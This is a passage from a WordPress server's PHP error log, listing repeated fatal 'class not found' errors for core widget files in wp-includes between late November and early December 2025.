  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[28-Nov-2025 07:50:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Nov-2025 13:07:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[28-Nov-2025 20:40:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Nov-2025 21:59:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[29-Nov-2025 00:35:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[29-Nov-2025 07:00:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Nov-2025 00:53:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[30-Nov-2025 07:15:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[30-Nov-2025 14:35:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[01-Dec-2025 01:06:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[01-Dec-2025 09:38:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[01-Dec-2025 10:12:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[01-Dec-2025 12:22:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[01-Dec-2025 15:22:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[01-Dec-2025 15:25:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Dec-2025 18:23:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[01-Dec-2025 20:51:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[01-Dec-2025 20:51:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[01-Dec-2025 20:51:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[01-Dec-2025 20:51:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[01-Dec-2025 20:51:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[01-Dec-2025 20:51:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[01-Dec-2025 20:51:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[01-Dec-2025 20:51:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[01-Dec-2025 20:51:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[01-Dec-2025 20:51:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[01-Dec-2025 20:51:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[01-Dec-2025 20:51:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[01-Dec-2025 20:51:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[01-Dec-2025 20:51:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[01-Dec-2025 20:51:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[01-Dec-2025 20:51:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[01-Dec-2025 20:51:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[01-Dec-2025 20:51:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Dec-2025 20:51:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[01-Dec-2025 20:51:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[01-Dec-2025 22:41:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[02-Dec-2025 01:43:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[02-Dec-2025 02:52:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Dec-2025 03:13:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Dec-2025 03:44:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Dec-2025 04:15:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Dec-2025 05:44:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Dec-2025 05:44:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Dec-2025 05:44:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[02-Dec-2025 07:42:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[02-Dec-2025 07:42:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[02-Dec-2025 10:31:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Dec-2025 10:35:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Dec-2025 10:48:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Dec-2025 11:06:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Dec-2025 13:25:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[02-Dec-2025 13:25:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[02-Dec-2025 14:01:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[02-Dec-2025 14:11:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Dec-2025 15:01:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[02-Dec-2025 15:01:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[02-Dec-2025 15:01:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Dec-2025 15:01:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[02-Dec-2025 15:01:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Dec-2025 15:01:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Dec-2025 15:01:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Dec-2025 15:01:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[02-Dec-2025 15:02:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Dec-2025 15:02:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[02-Dec-2025 15:02:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[02-Dec-2025 15:02:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Dec-2025 15:02:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Dec-2025 15:02:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[02-Dec-2025 15:02:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Dec-2025 15:02:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Dec-2025 15:02:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Dec-2025 15:02:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[02-Dec-2025 15:02:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Dec-2025 15:02:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Dec-2025 16:34:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Dec-2025 16:53:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Dec-2025 17:29:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Dec-2025 17:35:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[02-Dec-2025 17:59:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Dec-2025 18:03:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Dec-2025 18:03:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Dec-2025 20:30:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[02-Dec-2025 22:30:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[03-Dec-2025 13:01:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[03-Dec-2025 13:11:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[03-Dec-2025 14:31:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[04-Dec-2025 02:03:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[04-Dec-2025 02:04:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[04-Dec-2025 02:07:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[04-Dec-2025 02:12:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[04-Dec-2025 02:22:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Dec-2025 02:41:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[04-Dec-2025 03:19:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[04-Dec-2025 05:07:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[04-Dec-2025 08:35:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[04-Dec-2025 22:50:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[04-Dec-2025 22:51:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
